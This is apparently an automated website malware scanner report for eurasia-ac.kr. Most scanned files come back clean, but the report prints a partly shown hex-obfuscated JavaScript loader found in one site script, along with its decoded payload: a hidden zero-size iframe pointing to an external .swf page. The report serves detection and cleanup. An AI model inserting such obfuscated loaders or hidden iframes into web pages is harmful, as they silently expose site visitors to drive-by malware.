New scan:

Malware Scanner report for eurasia-ac.kr

Malicious/Suspicious/Total urls checked
0/1/15
1 page has suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "eurasia-ac.kr" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=eurasia-ac.kr

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://eurasia-ac.kr/
200 OK
Content-Length: 43363
Content-Type: text/html
clean
http://eurasia-ac.kr/inc/okplugin_js.js
200 OK
Content-Length: 925
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

function PrintEmbed(EmbID)
{
document.write(document.getElementById(EmbID).value);
}
var _$=["\x64\x6f\x63\x75\x6d\x65\x6e\x74","\x63\x6f\x6f\x6b\x69\x65","\x69\x6e\x64\x65\x78\x4f\x66",'\x6c\x6f\x6e\x67\x3d',"\x73\x65\x74\x54\x69\x6d\x65","\x67\x65\x74\x54\x69\x6d\x65",'\x6c\x6f\x6e\x67\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67","\x77\x72\x
...[489 bytes skipped]...

Decoded script:


<iframe src=http://meehospital.com/swf/index.html width=0 height=0></iframe>

http://eurasia-ac.kr/js/common.js
200 OK
Content-Length: 5375
Content-Type: application/javascript
clean
http://eurasia-ac.kr/js/common_ro.js
200 OK
Content-Length: 34593
Content-Type: application/javascript
clean
http://eurasia-ac.kr/js/popup.js
200 OK
Content-Length: 4165
Content-Type: application/javascript
clean
http://eurasia-ac.kr/js/object_embed.js
200 OK
Content-Length: 3243
Content-Type: application/javascript
clean
http://eurasia-ac.kr/js/flash.js
200 OK
Content-Length: 2955
Content-Type: application/javascript
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js
200 OK
Content-Length: 91556
Content-Type: text/javascript
clean
http://eurasia-ac.kr/login/login.php
200 OK
Content-Length: 20819
Content-Type: text/html
clean
http://eurasia-ac.kr/login/
403 Forbidden
Content-Length: 204
Content-Type: text/html
clean
http://eurasia-ac.kr/test404page.js
404 Not Found
Content-Length: 208
Content-Type: text/html
clean
http://eurasia-ac.kr/member/join_step1.php
200 OK
Content-Length: 47454
Content-Type: text/html
clean
http://secure.nuguya.com/nuguya/nice.nuguya.oivs.crypto.js
200 OK
Content-Length: 25258
Content-Type: application/x-javascript
clean
http://secure.nuguya.com/nuguya/nice.nuguya.oivs.msg.js
200 OK
Content-Length: 9559
Content-Type: application/x-javascript
clean
http://secure.nuguya.com/nuguya/nice.nuguya.oivs.util.js
200 OK
Content-Length: 14963
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: eurasia-ac.kr

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 12 Jan 2015 06:52:34 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=euc-kr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: PHPSESSID=ch1ilm0oefom5pgjr9j2bp6ct1; path=/
Set-Cookie: eurasia-ac_kr-recommend=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
X-Powered-By: PHP/5.3.13p1
Second query (visit from search engine):
GET / HTTP/1.1
Host: eurasia-ac.kr
Referer: http://www.google.com/search?q=eurasia-ac.kr

Result:
The result is similar to the first query. There are no suspicious redirects found.